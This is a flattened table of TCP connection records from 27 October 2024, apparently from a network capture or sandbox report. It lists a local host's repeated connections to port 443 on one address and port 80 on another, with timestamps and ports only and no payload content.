                                                                                                Oct 27, 2024 17:11:13.023803949 CET4435777413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.024224997 CET4435777413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.024279118 CET57774443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.024312019 CET57774443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.024328947 CET4435777413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.024339914 CET57774443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.024347067 CET4435777413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.024355888 CET4435777613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.024487972 CET4435777613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.025979996 CET57776443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.026035070 CET57780443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.026077032 CET57776443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.026082993 CET4435778013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.026122093 CET4435777613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.026151896 CET57776443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.026154041 CET57780443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.026168108 CET4435777613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.026344061 CET57780443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.026375055 CET4435778013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.028146029 CET57781443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.028177023 CET4435778113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.028307915 CET57781443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.028405905 CET57781443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.028419971 CET4435778113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.141946077 CET4435777713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.142184019 CET4435777713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.142291069 CET57777443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.142414093 CET57777443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.142426968 CET4435777713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.142437935 CET57777443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.142445087 CET4435777713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.144313097 CET57782443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.144350052 CET4435778213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.144423962 CET57782443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.144530058 CET57782443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.144551039 CET4435778213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.150073051 CET5776780192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:13.150296926 CET5778380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:13.156538963 CET8057783152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.156619072 CET5778380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:13.156743050 CET5778380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:13.157541990 CET8057767152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.157608032 CET5776780192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:13.163114071 CET8057783152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.754513979 CET4435777813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.755268097 CET57778443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.755330086 CET4435777813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.755662918 CET57778443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.755678892 CET4435777813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.761157036 CET4435777913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.763128996 CET57779443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.763160944 CET4435777913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.763473034 CET57779443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.763479948 CET4435777913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.774651051 CET4435778113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.775141001 CET57781443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.775180101 CET4435778113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.775468111 CET57781443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.775480986 CET4435778113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.786818981 CET4435778013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.791173935 CET57780443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.791233063 CET4435778013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.791527033 CET57780443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.791542053 CET4435778013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.886158943 CET4435777813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.886217117 CET4435777813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.886413097 CET57778443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.886414051 CET57778443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.886414051 CET57778443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.891669989 CET57784443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.891762018 CET4435778413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.891984940 CET57784443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.892065048 CET57784443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.892086983 CET4435778413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.892319918 CET4435778213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.892556906 CET57782443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.892579079 CET4435778213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.892879009 CET57782443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.892889023 CET4435778213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.892904043 CET4435777913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.893013000 CET4435777913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.893913984 CET57779443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.893945932 CET57779443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.893965006 CET4435777913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.893975973 CET57779443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.893982887 CET4435777913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.895800114 CET57785443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.895898104 CET4435778513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.895971060 CET57785443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.898915052 CET57785443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.898945093 CET4435778513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.027193069 CET4435778213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.027414083 CET4435778213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.027489901 CET57782443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.028964996 CET57782443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.029011011 CET4435778213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.029038906 CET57782443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.029057026 CET4435778213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.032839060 CET57786443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.032896996 CET4435778613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.034782887 CET57786443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.038851976 CET57786443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.038881063 CET4435778613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.043231964 CET8057783152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.044734955 CET5778380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:14.133589983 CET4435778013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.133764982 CET4435778013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.133856058 CET57780443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.174551964 CET57780443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.174551964 CET57780443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.174591064 CET4435778013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.174628019 CET4435778013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.191478014 CET57787443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.191550970 CET4435778713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.191623926 CET57787443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.191853046 CET57787443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.191886902 CET4435778713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.193928957 CET57778443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.193979979 CET4435777813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.202713013 CET4435778113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.202863932 CET4435778113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.206906080 CET57781443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.314229012 CET57781443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.314275026 CET4435778113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.314327955 CET57781443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.314343929 CET4435778113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.500226021 CET57788443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.500324965 CET4435778813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.500407934 CET57788443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.500571012 CET57788443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.500608921 CET4435778813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.619961023 CET4435778413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.622500896 CET57784443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.622529984 CET4435778413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.622948885 CET57784443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.622956991 CET4435778413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.652468920 CET4435778513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.673105955 CET57785443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.673162937 CET4435778513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.673624039 CET57785443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.673639059 CET4435778513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.755188942 CET4435778413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.755343914 CET4435778413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.755410910 CET57784443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.755474091 CET57784443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.755474091 CET57784443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.755511045 CET4435778413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.755533934 CET4435778413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.758466005 CET57789443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.758505106 CET4435778913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.758685112 CET57789443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.758714914 CET57789443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.758721113 CET4435778913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.796097040 CET4435778613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.796545029 CET57786443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.796565056 CET4435778613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.796940088 CET57786443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.796951056 CET4435778613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.804426908 CET4435778513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.804574966 CET4435778513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.804647923 CET57785443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.804723024 CET57785443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.804723024 CET57785443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.804764986 CET4435778513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.804790974 CET4435778513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.806471109 CET57790443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.806526899 CET4435779013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.806606054 CET57790443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.806852102 CET57790443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.806881905 CET4435779013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.930720091 CET4435778613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.930790901 CET4435778613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.930876017 CET57786443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.930890083 CET4435778713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.930927992 CET57786443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.930953026 CET4435778613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.930975914 CET57786443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.930989981 CET4435778613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.931866884 CET57787443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.931912899 CET4435778713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.932229042 CET57787443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.932241917 CET4435778713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.933307886 CET57791443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.933348894 CET4435779113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:14.933425903 CET57791443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.933514118 CET57791443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:14.933533907 CET4435779113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.060295105 CET4435778713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.060471058 CET4435778713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.060534954 CET57787443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.060610056 CET57787443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.060611010 CET57787443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.060641050 CET4435778713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.060664892 CET4435778713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.062797070 CET57792443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.062824011 CET4435779213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.063086033 CET57792443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.063334942 CET57792443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.063349962 CET4435779213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.267246008 CET4435778813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.268419981 CET57788443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.268480062 CET4435778813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.268821955 CET57788443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.268836975 CET4435778813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.404102087 CET4435778813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.404277086 CET4435778813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.404350996 CET57788443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.445125103 CET57788443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.445158005 CET4435778813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.445172071 CET57788443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.445179939 CET4435778813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.466892958 CET57793443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.466937065 CET4435779313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.467012882 CET57793443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.485287905 CET57793443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.485318899 CET4435779313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.497723103 CET4435778913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.498044014 CET57789443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.498054981 CET4435778913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.498456955 CET57789443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.498461008 CET4435778913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.560741901 CET4435779013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.561052084 CET57790443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.561081886 CET4435779013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.561412096 CET57790443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.561422110 CET4435779013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.628217936 CET4435778913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.628484011 CET4435778913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.628551960 CET57789443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.628665924 CET57789443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.628679037 CET4435778913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.628694057 CET57789443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.628699064 CET4435778913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.630549908 CET57794443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.630564928 CET4435779413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.630630016 CET57794443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.630726099 CET57794443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.630738020 CET4435779413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.675539970 CET4435779113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.679368019 CET57791443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.679392099 CET4435779113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.679737091 CET57791443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.679742098 CET4435779113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.679918051 CET5778380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:15.680169106 CET5779580192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:15.685551882 CET8057795152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.685820103 CET8057783152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.685894966 CET5778380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:15.686041117 CET5779580192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:15.686041117 CET5779580192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:15.691720963 CET8057795152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.692996979 CET4435779013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.693523884 CET4435779013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.693934917 CET57790443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.695080996 CET57790443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.695080996 CET57790443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.695106030 CET4435779013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.695127964 CET4435779013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.696253061 CET57796443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.696294069 CET4435779613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.696372032 CET57796443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.696475029 CET57796443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.696492910 CET4435779613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.807563066 CET4435779113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.807720900 CET4435779113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.807847977 CET57791443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.808088064 CET57791443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.808116913 CET4435779113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.808232069 CET57791443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.808240891 CET4435779113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.810188055 CET57797443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.810226917 CET4435779713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:15.811008930 CET57797443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.811163902 CET57797443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:15.811180115 CET4435779713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.173564911 CET4435779213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.176136971 CET57792443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.176151037 CET4435779213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.176548004 CET57792443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.176554918 CET4435779213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.211045980 CET4435779313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.211517096 CET57793443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.211565018 CET4435779313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.211983919 CET57793443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.211996078 CET4435779313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.306654930 CET4435779213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.306807995 CET4435779213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.306865931 CET57792443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.306936979 CET57792443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.306958914 CET4435779213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.306977034 CET57792443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.306982994 CET4435779213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.309461117 CET57798443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.309542894 CET4435779813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.309634924 CET57798443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.309760094 CET57798443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.309788942 CET4435779813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.340189934 CET4435779313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.340425968 CET4435779313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.340478897 CET57793443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.340542078 CET57793443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.340553045 CET4435779313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.340567112 CET57793443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.340573072 CET4435779313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.342513084 CET57799443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.342575073 CET4435779913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.342645884 CET57799443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.343009949 CET57799443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.343039989 CET4435779913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.384849072 CET4435779413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.391347885 CET57794443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.391359091 CET4435779413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.391848087 CET57794443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.391853094 CET4435779413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.449687004 CET4435779613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.450021982 CET57796443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.450078964 CET4435779613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.450401068 CET57796443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.450414896 CET4435779613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.520836115 CET4435779413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.520854950 CET4435779413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.520905018 CET4435779413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.520946026 CET57794443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.521048069 CET57794443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.521188974 CET57794443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.521188974 CET57794443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.521202087 CET4435779413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.521213055 CET4435779413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.524107933 CET57800443192.168.2.413.107.246.51
